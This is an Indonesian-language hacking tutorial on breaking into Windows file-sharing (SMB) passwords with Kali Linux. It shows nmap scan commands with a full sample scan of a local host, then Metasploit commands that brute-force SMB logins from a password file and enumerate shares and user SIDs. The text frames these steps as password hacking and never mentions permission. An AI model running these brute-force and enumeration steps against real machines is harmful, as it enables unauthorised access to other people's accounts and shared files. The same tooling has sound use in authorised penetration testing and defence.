Kali Linux: Membobol File Sharing Password di Windows 7
Scan Jaringan
Contoh
nmap -sS -A -O 192.168.0.7 nmap -sS -A -O 192.168.0.0/24 nmap -sS -A -O 192.168.0.7,90
Contoh hasil
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-11 07:41 WIB Nmap scan report for 192.168.0.7 Host is up (0.0027s latency). Not shown: 989 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.7.1p2 (protocol 2.0) | ssh-hostkey: |_ 1024 17:60:bb:44:2f:36:d8:df:6b:98:fb:63:7f:52:a7:a1 (RSA) 80/tcp open http lighttpd 1.4.31 |_http-server-header: lighttpd/1.4.31 |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 443/tcp open ssl/http lighttpd 1.4.31 | http-cisco-anyconnect: |_ ERROR: Not a Cisco ASA or unsupported version |_http-server-header: lighttpd/1.4.31 |_http-title: Site doesn't have a title (text/html). | ssl-cert: Subject: commonName=develop/organizationName=buffalo/stateOrProvinceName=Tokyo/countryName=JP | Not valid before: 2007-06-13T05:47:53 |_Not valid after: 2027-06-08T05:47:53 |_ssl-date: 2016-02-10T23:18:49+00:00; -1h25m51s from scanner time. 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 873/tcp open rsync (protocol version 30) 8873/tcp open ssl/rsync (protocol version 30) 9001/tcp open http libwww-perl-daemon httpd 1.36 | http-cisco-anyconnect: |_ ERROR: Not a Cisco ASA or unsupported version | http-robots.txt: 1 disallowed entry |_/ |_http-title: Squeezebox Server 9050/tcp open upnp TwonkyMedia UPnP (Linux 2.X.X; UPnP 1.0; pvConnect SDK 1.0; SDK 1.1) 9090/tcp open http uTorrent WebUI |_http-methods: No Allow or Public header in OPTIONS response (status code 400) |_http-title: Site doesn't have a title (text/html). 22939/tcp open ssl/unknown MAC Address: 4C:E6:76:1F:15:4C (Buffalo) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=6.49BETA4%E=4%D=2/11%OT=22%CT=1%CU=42073%PV=Y%DS=1%DC=D%G=Y%M=4CE OS:676%TM=56BBD996%P=x86_64-pc-linux-gnu)SEQ(SP=D6%GCD=1%ISR=D3%TI=Z%CI=Z%T OS:S=A)SEQ(SP=C1%GCD=1%ISR=C8%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B OS:4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W OS:1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF=Y%T=40%W=16D0% OS:O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R= OS:Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW7%RD=0%Q=)T4(R=Y%DF=Y%T=40% OS:W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q= OS:)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A= OS:S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RU OS:CK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 1 hop Service Info: OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel:2, cpe:/o:microsoft:windows Host script results: |_nbstat: NetBIOS name: TS-WVHL54C, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 3.6.3-31a.osstech) | Computer name: TS-WVHL54C | NetBIOS computer name: | Domain name: | FQDN: TS-WVHL54C |_ System time: 2016-02-11T06:18:51+07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smbv2-enabled: Server doesn't support SMBv2 protocol TRACEROUTE HOP RTT ADDRESS 1 2.71 ms 192.168.0.7 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 205.58 seconds
Hack Password
Menggunakan cara bruteforce untuk hack password. Cara ini cukup "ribut" karena semua kegiatan kita akan dicatat / di log oleh server, sehingga akan ketahuan.
msfconsole thankyou use auxiliary/scanner/smb/smb_login show options set RHOSTS 192.168.0.7 set SMBUser onno set PASS_FILE ‘/home/sathish/password’ set THREADS 10 run
Menggunakan modul smb_enumshares, kita bisa melakukan enumerasi setiap share SMB yang tersedia pada sistem remote.
use auxiliary/scanner/smb/smb_enumshares show options set RHOSTS 192.168.31.2 set SMBUser onno set SMBPass s3cr3t set THREADS 10 run
Modul smb_lookupsid, akan brute-force proses pencarian SID pada sejumlah target untuk menentukan pengguna lokal yang ada dalam sistem.
use auxiliary/scanner/smb/smb_lookupsid show options set RHOSTS 192.168.31.2 set SMBPass bhuvi set SMBUser sathish run